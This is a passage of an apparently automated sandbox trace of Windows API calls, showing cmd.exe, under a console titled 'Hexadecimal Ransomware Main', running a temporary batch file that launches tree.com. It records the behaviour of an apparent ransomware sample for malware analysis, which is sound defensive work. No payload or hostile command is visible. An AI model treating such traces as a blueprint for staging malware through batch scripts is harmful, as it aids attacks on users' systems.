returned 17 [0104.905] _wcsicmp (_String1="tree", _String2="CALL") returned 17 [0104.905] _wcsicmp (_String1="tree", _String2="VERIFY") returned -2 [0104.905] _wcsicmp (_String1="tree", _String2="VER") returned -2 [0104.905] _wcsicmp (_String1="tree", _String2="VOL") returned -2 [0104.905] _wcsicmp (_String1="tree", _String2="EXIT") returned 15 [0104.905] _wcsicmp (_String1="tree", _String2="SETLOCAL") returned 1 [0104.905] _wcsicmp (_String1="tree", _String2="ENDLOCAL") returned 15 [0104.905] _wcsicmp (_String1="tree", _String2="TITLE") returned 9 [0104.905] _wcsicmp (_String1="tree", _String2="START") returned 1 [0104.905] _wcsicmp (_String1="tree", _String2="DPATH") returned 16 [0104.905] _wcsicmp (_String1="tree", _String2="KEYS") returned 9 [0104.905] _wcsicmp (_String1="tree", _String2="MOVE") returned 7 [0104.906] _wcsicmp (_String1="tree", _String2="PUSHD") returned 4 [0104.906] _wcsicmp (_String1="tree", _String2="POPD") returned 4 [0104.906] _wcsicmp (_String1="tree", _String2="ASSOC") returned 19 [0104.906] _wcsicmp (_String1="tree", _String2="FTYPE") returned 14 [0104.906] _wcsicmp (_String1="tree", _String2="BREAK") returned 18 [0104.906] _wcsicmp (_String1="tree", _String2="COLOR") returned 17 [0104.906] _wcsicmp (_String1="tree", _String2="MKLINK") returned 7 [0104.906] _wcsicmp (_String1="tree", _String2="FOR") returned 14 [0104.906] _wcsicmp (_String1="tree", _String2="IF") returned 11 [0104.906] _wcsicmp (_String1="tree", _String2="REM") returned 2 [0104.906] ??_V@YAXPEAX@Z () returned 0x1 [0104.906] GetProcessHeap () returned 0x1dc256b0000 [0104.906] RtlAllocateHeap (HeapHandle=0x1dc256b0000, Flags=0x8, Size=0xffde) returned 0x1dc256d8720 [0104.906] GetProcessHeap () returned 0x1dc256b0000 [0104.906] RtlAllocateHeap (HeapHandle=0x1dc256b0000, Flags=0x8, Size=0x1a) returned 0x1dc256bbb60 [0104.906] _wcsnicmp (_String1="tree", _String2="cmd ", _MaxCount=0x4) returned 17 [0104.906] malloc (_Size=0xffce) returned 0x1dc25800120 [0104.907] ??_V@YAXPEAX@Z () returned 0x1dc25800120 [0104.907] GetProcessHeap () returned 0x1dc256b0000 [0104.907] RtlAllocateHeap (HeapHandle=0x1dc256b0000, Flags=0x8, Size=0x1ffac) returned 0x1dc256e8710 [0104.908] SetErrorMode (uMode=0x0) returned 0x0 [0104.908] SetErrorMode (uMode=0x1) returned 0x0 [0104.908] GetFullPathNameW (in: lpFileName=".", nBufferLength=0xffce, lpBuffer=0x1dc256e8720, lpFilePart=0x407419e520 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop", lpFilePart=0x407419e520*="Desktop") returned 0x17 [0104.908] SetErrorMode (uMode=0x0) returned 0x1 [0104.908] GetProcessHeap () returned 0x1dc256b0000 [0104.908] RtlReAllocateHeap (Heap=0x1dc256b0000, Flags=0x0, Ptr=0x1dc256e8710, Size=0x4a) returned 0x1dc256e8710 [0104.908] GetProcessHeap () returned 0x1dc256b0000 [0104.908] RtlSizeHeap (HeapHandle=0x1dc256b0000, Flags=0x0, MemoryPointer=0x1dc256e8710) returned 0x4a [0104.908] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x7ff67b90bb90, nSize=0x2000 | out: lpBuffer="C:\\ProgramData\\Oracle\\Java\\javapath;C:\\WINDOWS\\system32;C:\\WINDOWS;C:\\WINDOWS\\System32\\Wbem;C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\;C:\\Users\\FD1HVy\\AppData\\Local\\Microsoft\\WindowsApps") returned 0xbb [0104.908] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0104.908] GetProcessHeap () returned 0x1dc256b0000 [0104.908] RtlAllocateHeap (HeapHandle=0x1dc256b0000, Flags=0x8, Size=0x1bc) returned 0x1dc256bd9e0 [0104.908] GetProcessHeap () returned 0x1dc256b0000 [0104.909] RtlAllocateHeap (HeapHandle=0x1dc256b0000, Flags=0x8, Size=0x368) returned 0x1dc256be430 [0104.909] GetProcessHeap () returned 0x1dc256b0000 [0104.909] RtlReAllocateHeap (Heap=0x1dc256b0000, Flags=0x0, Ptr=0x1dc256be430, Size=0x1be) returned 0x1dc256be430 [0104.909] GetProcessHeap () returned 0x1dc256b0000 [0104.909] RtlSizeHeap (HeapHandle=0x1dc256b0000, Flags=0x0, MemoryPointer=0x1dc256be430) returned 0x1be [0104.909] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x7ff67b90bb90, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0104.909] GetProcessHeap () returned 0x1dc256b0000 [0104.909] RtlAllocateHeap (HeapHandle=0x1dc256b0000, Flags=0x8, Size=0xe8) returned 0x1dc256be600 [0104.909] GetProcessHeap () returned 0x1dc256b0000 [0104.909] RtlReAllocateHeap (Heap=0x1dc256b0000, Flags=0x0, Ptr=0x1dc256be600, Size=0x7e) returned 0x1dc256be600 [0104.909] GetProcessHeap () returned 0x1dc256b0000 [0104.909] RtlSizeHeap (HeapHandle=0x1dc256b0000, Flags=0x0, MemoryPointer=0x1dc256be600) returned 0x7e [0104.909] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0104.909] FindFirstFileExW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\tree.*", fInfoLevelId=0x1, lpFindFileData=0x407419e290, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x407419e290) returned 0xffffffffffffffff [0104.909] GetLastError () returned 0x2 [0104.909] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0104.910] FindFirstFileExW (in: lpFileName="C:\\ProgramData\\Oracle\\Java\\javapath\\tree.*", fInfoLevelId=0x1, lpFindFileData=0x407419e290, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x407419e290) returned 0xffffffffffffffff [0104.910] GetLastError () returned 0x2 [0104.910] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0104.910] FindFirstFileExW (in: lpFileName="C:\\WINDOWS\\system32\\tree.*", fInfoLevelId=0x1, lpFindFileData=0x407419e290, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x407419e290) returned 0x1dc256bede0 [0104.910] FindClose (in: hFindFile=0x1dc256bede0 | out: hFindFile=0x1dc256bede0) returned 1 [0104.910] FindFirstFileExW (in: lpFileName="C:\\WINDOWS\\system32\\tree.COM", fInfoLevelId=0x1, lpFindFileData=0x407419e290, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x407419e290) returned 0x1dc256bf020 [0104.910] FindClose (in: hFindFile=0x1dc256bf020 | out: hFindFile=0x1dc256bf020) returned 1 [0104.910] _wcsicmp (_String1=".COM", _String2=".BAT") returned 1 [0104.910] _wcsicmp (_String1=".COM", _String2=".CMD") returned 2 [0104.910] ??_V@YAXPEAX@Z () returned 0x1 [0104.911] GetConsoleTitleW (in: lpConsoleTitle=0x407419e810, nSize=0x104 | out: lpConsoleTitle="Administrator: Hexadecimal Ransomware Main") returned 0x2c [0104.913] InitializeProcThreadAttributeList (in: lpAttributeList=0x407419e730, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x407419e620 | out: lpAttributeList=0x407419e730, lpSize=0x407419e620) returned 1 [0104.913] UpdateProcThreadAttribute (in: lpAttributeList=0x407419e730, dwFlags=0x0, Attribute=0x60001, lpValue=0x407419e60c, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x407419e730, lpPreviousValue=0x0) returned 1 [0104.913] GetStartupInfoW (in: lpStartupInfo=0x407419e6c0 | out: lpStartupInfo=0x407419e6c0*(cb=0x68, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\WINDOWS\\sysnative\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0)) [0104.913] GetProcessHeap () returned 0x1dc256b0000 [0104.913] RtlAllocateHeap (HeapHandle=0x1dc256b0000, Flags=0x8, Size=0x20) returned 0x1dc256b1640 [0104.913] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0104.913] _wcsnicmp (_String1="COPYCMD", _String2="=ExitCo", _MaxCount=0x7) returned 38 [0104.913] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0104.913] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0104.913] _wcsnicmp (_String1="COPYCMD", _String2="b2eincf", _MaxCount=0x7) returned 1 [0104.913] _wcsnicmp (_String1="COPYCMD", _String2="b2eincf", _MaxCount=0x7) returned 1 [0104.913] _wcsnicmp (_String1="COPYCMD", _String2="b2eincf", _MaxCount=0x7) returned 1 [0104.913] _wcsnicmp (_String1="COPYCMD", _String2="b2eincf", _MaxCount=0x7) returned 1 [0104.913] _wcsnicmp (_String1="COPYCMD", _String2="b2eincf", _MaxCount=0x7) returned 1 [0104.913] _wcsnicmp (_String1="COPYCMD", _String2="b2eincf", _MaxCount=0x7) returned 1 [0104.913] _wcsnicmp (_String1="COPYCMD", _String2="b2eincf", _MaxCount=0x7) returned 1 [0104.913] _wcsnicmp (_String1="COPYCMD", _String2="b2eincf", _MaxCount=0x7) returned 1 [0104.914] _wcsnicmp (_String1="COPYCMD", _String2="b2eincf", _MaxCount=0x7) returned 1 [0104.914] _wcsnicmp (_String1="COPYCMD", _String2="b2eincf", _MaxCount=0x7) returned 1 [0104.914] _wcsnicmp (_String1="COPYCMD", _String2="b2eincf", _MaxCount=0x7) returned 1 [0104.914] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0104.914] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0104.914] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0104.914] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0104.914] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0104.914] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0104.914] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0104.914] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0104.914] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0104.914] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0104.914] _wcsnicmp (_String1="COPYCMD", _String2="OneDriv", _MaxCount=0x7) returned -12 [0104.914] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0104.914] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0104.914] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0104.914] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0104.914] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0104.914] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0104.914] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0104.914] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0104.914] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0104.914] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0104.914] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0104.915] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0104.915] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0104.915] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0104.915] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0104.915] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0104.915] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0104.915] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0104.915] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0104.915] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0104.915] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0104.915] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0104.915] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0104.915] GetProcessHeap () returned 0x1dc256b0000 [0104.915] RtlFreeHeap (HeapHandle=0x1dc256b0000, Flags=0x0, BaseAddress=0x1dc256b1640) returned 1 [0104.915] GetProcessHeap () returned 0x1dc256b0000 [0104.915] RtlAllocateHeap (HeapHandle=0x1dc256b0000, Flags=0x8, Size=0x12) returned 0x1dc256b9260 [0104.915] lstrcmpW (lpString1="\\tree.com", lpString2="\\XCOPY.EXE") returned -1 [0104.915] _get_osfhandle (_FileHandle=1) returned 0x50 [0104.915] SetConsoleMode (hConsoleHandle=0x50, dwMode=0x3) returned 1 [0104.917] _get_osfhandle (_FileHandle=0) returned 0x4c [0104.917] SetConsoleMode (hConsoleHandle=0x4c, dwMode=0x1f7) returned 1 [0105.005] CreateProcessW (in: lpApplicationName="C:\\WINDOWS\\system32\\tree.com", lpCommandLine="tree", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\FD1HVy\\Desktop", lpStartupInfo=0x407419e650*(cb=0x70, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="tree", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x407419e628 | out: lpCommandLine="tree", lpProcessInformation=0x407419e628*(hProcess=0xa0, hThread=0x9c, dwProcessId=0x3e0, dwThreadId=0x908)) returned 1 [0105.024] CloseHandle (hObject=0x9c) returned 1 [0105.024] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0105.024] GetProcessHeap () returned 0x1dc256b0000 [0105.025] RtlFreeHeap (HeapHandle=0x1dc256b0000, Flags=0x0, BaseAddress=0x1dc256bf990) returned 1 [0105.025] GetEnvironmentStringsW () returned 0x1dc256b5e60* [0105.025] GetProcessHeap () returned 0x1dc256b0000 [0105.025] RtlAllocateHeap (HeapHandle=0x1dc256b0000, Flags=0x8, Size=0xec2) returned 0x1dc256bf990 [0105.025] FreeEnvironmentStringsA (penv="=") returned 1 [0105.025] WaitForSingleObject (hHandle=0xa0, dwMilliseconds=0xffffffff) returned 0x0 [0105.422] GetExitCodeProcess (in: hProcess=0xa0, lpExitCode=0x407419e5a8 | out: lpExitCode=0x407419e5a8*=0x0) returned 1 [0105.422] CloseHandle (hObject=0xa0) returned 1 [0105.422] _vsnwprintf (in: _Buffer=0x407419e778, _BufferCount=0x13, _Format="%08X", _ArgList=0x407419e5b8 | out: _Buffer="00000000") returned 8 [0105.422] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0105.422] GetProcessHeap () returned 0x1dc256b0000 [0105.422] RtlFreeHeap (HeapHandle=0x1dc256b0000, Flags=0x0, BaseAddress=0x1dc256bf990) returned 1 [0105.422] GetEnvironmentStringsW () returned 0x1dc256b5e60* [0105.422] GetProcessHeap () returned 0x1dc256b0000 [0105.422] RtlAllocateHeap (HeapHandle=0x1dc256b0000, Flags=0x8, Size=0xec2) returned 0x1dc256bf990 [0105.422] FreeEnvironmentStringsA (penv="=") returned 1 [0105.422] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0105.422] GetProcessHeap () returned 0x1dc256b0000 [0105.422] RtlFreeHeap (HeapHandle=0x1dc256b0000, Flags=0x0, BaseAddress=0x1dc256bf990) returned 1 [0105.422] GetEnvironmentStringsW () returned 0x1dc256b5e60* [0105.692] GetProcessHeap () returned 0x1dc256b0000 [0105.693] RtlAllocateHeap (HeapHandle=0x1dc256b0000, Flags=0x8, Size=0xec2) returned 0x1dc256bf990 [0105.693] FreeEnvironmentStringsA (penv="=") returned 1 [0105.693] GetProcessHeap () returned 0x1dc256b0000 [0105.693] RtlFreeHeap (HeapHandle=0x1dc256b0000, Flags=0x0, BaseAddress=0x1dc256b9260) returned 1 [0105.693] DeleteProcThreadAttributeList (in: lpAttributeList=0x407419e730 | out: lpAttributeList=0x407419e730) [0105.693] ??_V@YAXPEAX@Z () returned 0x1 [0105.694] _get_osfhandle (_FileHandle=1) returned 0x50 [0105.694] SetConsoleMode (hConsoleHandle=0x50, dwMode=0x3) returned 1 [0105.910] _get_osfhandle (_FileHandle=1) returned 0x50 [0105.910] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0x7ff67b90fc08 | out: lpMode=0x7ff67b90fc08) returned 1 [0106.017] _get_osfhandle (_FileHandle=1) returned 0x50 [0106.017] SetConsoleMode (hConsoleHandle=0x50, dwMode=0x7) returned 1 [0106.058] _get_osfhandle (_FileHandle=0) returned 0x4c [0106.058] GetConsoleMode (in: hConsoleHandle=0x4c, lpMode=0x7ff67b90fc0c | out: lpMode=0x7ff67b90fc0c) returned 1 [0106.234] _get_osfhandle (_FileHandle=0) returned 0x4c [0106.234] SetConsoleMode (hConsoleHandle=0x4c, dwMode=0x1e7) returned 1 [0106.240] SetConsoleInputExeNameW () returned 0x1 [0106.240] GetConsoleOutputCP () returned 0x1b5 [0106.271] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x7ff67b90fbb0 | out: lpCPInfo=0x7ff67b90fbb0) returned 1 [0106.271] SetThreadUILanguage (LangId=0x0) returned 0x409 [0106.308] ??_V@YAXPEAX@Z () returned 0x1 [0106.309] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\9B7B.tmp\\9BBA.tmp\\9BCB.bat" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\temp\\9b7b.tmp\\9bba.tmp\\9bcb.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x407419eef8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa0 [0106.309] _open_osfhandle (_OSFileHandle=0xa0, _Flags=8) returned 3 [0106.309] _get_osfhandle (_FileHandle=3) returned 0xa0 [0106.309] SetFilePointer (in: hFile=0xa0, lDistanceToMove=75, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x4b [0106.309] GetProcessHeap () returned 0x1dc256b0000 [0106.309] RtlFreeHeap (HeapHandle=0x1dc256b0000, Flags=0x0, BaseAddress=0x1dc256be600) returned 1 [0106.309] GetProcessHeap () returned 0x1dc256b0000 [0106.309] RtlFreeHeap (HeapHandle=0x1dc256b0000, Flags=0x0, BaseAddress=0x1dc256be430) returned 1 [0106.309] GetProcessHeap () returned 0x1dc256b0000 [0106.309] RtlFreeHeap (HeapHandle=0x1dc256b0000, Flags=0x0, BaseAddress=0x1dc256bd9e0) returned 1 [0106.309] GetProcessHeap () returned 0x1dc256b0000 [0106.309] RtlFreeHeap (HeapHandle=0x1dc256b0000, Flags=0x0, BaseAddress=0x1dc256e8710) returned 1 [0106.310] GetProcessHeap () returned 0x1dc256b0000 [0106.310] RtlFreeHeap (HeapHandle=0x1dc256b0000, Flags=0x0, BaseAddress=0x1dc256bbb60) returned 1 [0106.310] GetProcessHeap () returned 0x1dc256b0000 [0106.310] RtlFreeHeap (HeapHandle=0x1dc256b0000, Flags=0x0, BaseAddress=0x1dc256d8720) returned 1 [0106.310] GetProcessHeap () returned 0x1dc256b0000 [0106.310] RtlFreeHeap (HeapHandle=0x1dc256b0000, Flags=0x0, BaseAddress=0x1dc256bcf80) returned 1 [0106.310] GetProcessHeap () returned 0x1dc256b0000 [0106.310] RtlFreeHeap (HeapHandle=0x1dc256b0000, Flags=0x0, BaseAddress=0x1dc256be260) returned 1 [0106.310] GetProcessHeap () returned 0x1dc256b0000 [0106.310] RtlFreeHeap (HeapHandle=0x1dc256b0000, Flags=0x0, BaseAddress=0x1dc256bd470) returned 1 [0106.310] GetProcessHeap () returned 0x1dc256b0000 [0106.310] RtlFreeHeap (HeapHandle=0x1dc256b0000, Flags=0x0, BaseAddress=0x1dc256d86c0) returned 1 [0106.311] GetProcessHeap () returned 0x1dc256b0000 [0106.311] RtlFreeHeap (HeapHandle=0x1dc256b0000, Flags=0x0, BaseAddress=0x1dc256b9920) returned 1 [0106.311] GetProcessHeap () returned 0x1dc256b0000 [0106.311] RtlFreeHeap (HeapHandle=0x1dc256b0000, Flags=0x0, BaseAddress=0x1dc256bba70) returned 1 [0106.311] _get_osfhandle (_FileHandle=3) returned 0xa0 [0106.311] SetFilePointer (in: hFile=0xa0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x4b [0106.311] ReadFile (in: hFile=0xa0, lpBuffer=0x7ff67b909970, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x407419eeb0, lpOverlapped=0x0 | out: lpBuffer=0x7ff67b909970*, lpNumberOfBytesRead=0x407419eeb0*=0x19e, lpOverlapped=0x0) returned 1 [0106.312] SetFilePointer (in: hFile=0xa0, lDistanceToMove=81, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x51 [0106.312] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x7ff67b909970, cbMultiByte=6, lpWideCharStr=0x7ff67b913c30, cchWideChar=8191 | out: lpWideCharStr="tree\r\nHexadecimal Ransomware Main\r\n") returned 6 [0106.312] _get_osfhandle (_FileHandle=3) returned 0xa0 [0106.312] GetFileType (hFile=0xa0) returned 0x1 [0106.312] _get_osfhandle (_FileHandle=3) returned 0xa0 [0106.312] SetFilePointer (in: hFile=0xa0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x51 [0106.312] GetProcessHeap () returned 0x1dc256b0000 [0106.312] RtlAllocateHeap (HeapHandle=0x1dc256b0000, Flags=0x8, Size=0x4012) returned 0x1dc256c0860 [0106.312] GetProcessHeap () returned 0x1dc256b0000 [0106.312] RtlFreeHeap (HeapHandle=0x1dc256b0000, Flags=0x0, BaseAddress=0x1dc256c0860) returned 1 [0106.313] _wcsicmp (_String1="tree", _String2=")") returned 75 [0106.313] _wcsicmp (_String1="FOR", _String2="tree") returned -14 [0106.313] _wcsicmp (_String1="FOR/?", _String2="tree") returned -14 [0106.313] _wcsicmp (_String1="IF", _String2="tree") returned -11 [0106.313] _wcsicmp (_String1="IF/?", _String2="tree") returned -11 [0106.313] _wcsicmp (_String1="REM", _String2="tree") returned -2 [0106.313] _wcsicmp (_String1="REM/?", _String2="tree") returned -2 [0106.313] GetProcessHeap () returned 0x1dc256b0000 [0106.313] RtlAllocateHeap (HeapHandle=0x1dc256b0000, Flags=0x8, Size=0xb0) returned 0x1dc256bba70 [0106.313] GetProcessHeap () returned 0x1dc256b0000 [0106.313] RtlAllocateHeap (HeapHandle=0x1dc256b0000, Flags=0x8, Size=0x1a) returned 0x1dc256b9920 [0106.313] _tell (_FileHandle=3) returned 81 [0106.313] _close (_FileHandle=3) returned 0 [0106.314] malloc (_Size=0xffce) returned 0x1dc257e0160 [0106.314] ??_V@YAXPEAX@Z () returned 0x1dc257e0160 [0106.315] _wcsicmp (_String1="tree", _String2="DIR") returned 16 [0106.315] _wcsicmp (_String1="tree", _String2="ERASE") returned 15 [0106.315] _wcsicmp (_String1="tree", _String2="DEL") returned 16 [0106.315] _wcsicmp (_String1="tree", _String2="TYPE") returned -7 [0106.315] _wcsicmp (_String1="tree", _String2="COPY") returned 17 [0106.315] _wcsicmp (_String1="tree", _String2="CD") returned 17 [0106.315] _wcsicmp (_String1="tree", _String2="CHDIR") returned 17 [0106.315] _wcsicmp (_String1="tree", _String2="RENAME") returned 2 [0106.315] _wcsicmp (_String1="tree", _String2="REN") returned 2 [0106.315] _wcsicmp (_String1="tree", _String2="ECHO") returned 15 [0106.315] _wcsicmp (_String1="tree", _String2="SET") returned 1 [0106.315] _wcsicmp (_String1="tree", _String2="PAUSE") returned 4 [0106.315] _wcsicmp (_String1="tree", _String2="DATE") returned 16 [0106.315] _wcsicmp (_String1="tree", _String2="TIME") returned 9 [0106.315] _wcsicmp (_String1="tree", _String2="PROMPT") returned 4 [0106.315] _wcsicmp (_String1="tree", _String2="MD") returned 7 [0106.315] _wcsicmp (_String1="tree", _String2="MKDIR") returned 7 [0106.315] _wcsicmp (_String1="tree", _String2="RD") returned 2 [0106.316] _wcsicmp (_String1="tree", _String2="RMDIR") returned 2 [0106.316] _wcsicmp (_String1="tree", _String2="PATH") returned 4 [0106.316] _wcsicmp (_String1="tree", _String2="GOTO") returned 13 [0106.316] _wcsicmp (_String1="tree", _String2="SHIFT") returned 1 [0106.316] _wcsicmp (_String1="tree", _String2="CLS") returned 17 [0106.316] _wcsicmp (_String1="tree", _String2="CALL") returned 17 [0106.316] _wcsicmp (_String1="tree", _String2="VERIFY") returned -2 [0106.316] _wcsicmp (_String1="tree", _String2="VER") returned -2 [0106.316] _wcsicmp (_String1="tree", _String2="VOL") returned -2 [0106.316] _wcsicmp (_String1="tree", _String2="EXIT") returned 15 [0106.316] _wcsicmp (_String1="tree", _String2="SETLOCAL") returned 1 [0106.316] _wcsicmp (_String1="tree", _String2="ENDLOCAL") returned 15 [0106.316] _wcsicmp (_String1="tree", _String2="TITLE") returned 9 [0106.316] _wcsicmp (_String1="tree", _String2="START") returned 1 [0106.316] _wcsicmp (_String1="tree", _String2="DPATH") returned 16 [0106.316] _wcsicmp (_String1="tree", _String2="KEYS") returned 9 [0106.316] _wcsicmp (_String1="tree", _String2="MOVE") returned 7 [0106.316] _wcsicmp (_String1="tree", _String2="PUSHD") returned 4 [0106.316] _wcsicmp (_String1="tree", _String2="POPD") returned 4 [0106.316] _wcsicmp (_String1="tree", _String2="ASSOC") returned 19 [0106.316] _wcsicmp (_String1="tree", _String2="FTYPE") returned 14 [0106.316] _wcsicmp (_String1="tree", _String2="BREAK") returned 18 [0106.316] _wcsicmp (_String1="tree", _String2="COLOR") returned 17 [0106.316] _wcsicmp (_String1="tree", _String2="MKLINK") returned 7 [0106.316] _wcsnicmp (_String1="tree", _String2="cmd ", _MaxCount=0x4) returned 17 [0106.316] malloc (_Size=0xffce) returned 0x1dc257f0140 [0106.316] ??_V@YAXPEAX@Z () returned 0x1dc257f0140 [0106.317] GetProcessHeap () returned 0x1dc256b0000 [0106.317] RtlAllocateHeap (HeapHandle=0x1dc256b0000, Flags=0x8, Size=0x1ffac) returned 0x1dc256d86c0 [0106.319] SetErrorMode (uMode=0x0) returned 0x0 [0106.319] SetErrorMode (uMode=0x1) returned 0x0 [0106.319] GetFullPathNameW (in: lpFileName=".", nBufferLength=0xffce, lpBuffer=0x1dc256d86d0, lpFilePart=0x407419ecc0 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop", lpFilePart=0x407419ecc0*="Desktop") returned 0x17 [0106.319] SetErrorMode (uMode=0x0) returned 0x1 [0106.319] GetProcessHeap () returned 0x1dc256b0000 [0106.319] RtlReAllocateHeap (Heap=0x1dc256b0000, Flags=0x0, Ptr=0x1dc256d86c0, Size=0x4a) returned 0x1dc256d86c0 [0106.319] GetProcessHeap () returned 0x1dc256b0000 [0106.319] RtlSizeHeap (HeapHandle=0x1dc256b0000, Flags=0x0, MemoryPointer=0x1dc256d86c0) returned 0x4a [0106.319] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x7ff67b90bb90, nSize=0x2000 | out: lpBuffer="C:\\ProgramData\\Oracle\\Java\\javapath;C:\\WINDOWS\\system32;C:\\WINDOWS;C:\\WINDOWS\\System32\\Wbem;C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\;C:\\Users\\FD1HVy\\AppData\\Local\\Microsoft\\WindowsApps") returned 0xbb [0106.320] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0106.320] GetProcessHeap () returned 0x1dc256b0000 [0106.320] RtlAllocateHeap (HeapHandle=0x1dc256b0000, Flags=0x8, Size=0x1bc) returned 0x1dc256bd640 [0106.320] GetProcessHeap () returned 0x1dc256b0000 [0106.320] RtlAllocateHeap 